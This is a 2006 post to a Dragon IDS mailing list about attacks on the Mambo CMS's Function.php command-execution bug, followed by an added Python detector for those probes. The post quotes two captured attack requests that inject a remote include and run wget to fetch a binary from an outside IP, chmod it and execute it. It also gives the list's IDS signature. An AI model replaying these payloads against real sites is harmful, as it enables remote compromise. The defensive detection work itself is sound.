List: dragonidsuser
Subject: [Dragonidsuser] mambo attacks/probes
From: Mike Iglesias <iglesias () draco ! acs ! uci ! edu>
Date: 2006-03-08 19:21:22
Message-ID: 200603081921.k28JLMgo014051 () draco ! acs ! uci ! edu

We had a system or two compromised via the Mambo "Function.php arbitrary
command execution" bug, so we have set up a signature to catch the
probes/attacks when they happen.

Here are a couple of example attacks:

GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mos \
Config_absolute_path=http://204.83.56.144/cmd.gif?&cmd=cd%20/tmp;wget%20204.83.56.144/gicupo;chmod%20744%20gicupo;./gicupo;echo%20YYY;echo| \
HTTP/1.1{A}
GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConf \
ig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| \
HTTP/1.1{A}
Here's the signature we are using to catch these:
T D A S 10 200 W UCI:MAMBO-ATTACK /2fmambo/2f , wget
If you have a better way to catch these, please let me know.
Mike Iglesias Email: iglesias@uci.edu
University of California, Irvine phone: 949-824-6926
Network & Academic Computing Services FAX: 949-824-2069
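
Added example (not part of the original message, and not Dragon signature syntax): a Python check that keys on the request parameters visible in the two example requests above, namely a remote URL in mosConfig_absolute_path and the GLOBALS / _REQUEST[...] overrides, after percent-decoding, instead of on the install path or the downloader name. The function and reason names are hypothetical, and the sample request lines are constructed using the documentation address 192.0.2.10.

```python
import re
from urllib.parse import unquote

# Assumption: only parameter names seen in the example requests are checked.
REMOTE_URL = re.compile(r"^\s*(?:https?|ftp)://", re.I)
OVERRIDE_KEY = re.compile(r"^(?:GLOBALS|_REQUEST)(?:\[|$)")


def percent_decode(text, rounds=3):
    """Percent-decode repeatedly so double-encoded values are normalised."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def probe_reasons(request_line):
    """Return sorted reasons a request line looks like the probe ([] if none)."""
    parts = request_line.split()
    if len(parts) < 2:
        return []
    # Split on the first '?' only; the injected URL carries its own '?'.
    _, _, query = parts[1].partition("?")
    reasons = set()
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        key, value = percent_decode(key), percent_decode(value)
        if OVERRIDE_KEY.match(key):
            reasons.add("superglobal-override")
        if key.lower() == "mosconfig_absolute_path" and REMOTE_URL.match(value):
            reasons.add("remote-include")
    return sorted(reasons)


# Constructed sample request lines (not captured traffic).
SAMPLES = [
    "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1"
    "&GLOBALS=&mosConfig_absolute_path=http://192.0.2.10/cmd.gif?&cmd=echo%20YYY HTTP/1.1",
    # Different install path, encoded URL, no downloader name in the request.
    "GET /site/index2.php?GLOBALS=&mosConfig_absolute_path=hTTp%3A%2F%2F192.0.2.10%2Fx HTTP/1.1",
    # Double-encoded scheme separator.
    "GET /portal/index2.php?mosConfig_absolute_path=http%253A%252F%252F192.0.2.10%252Fx HTTP/1.1",
    # Benign: a site search for the word "wget" under /mambo/.
    "GET /mambo/index.php?option=com_search&searchword=wget HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(probe_reasons(line) or "clean", "<-", line[:60])
```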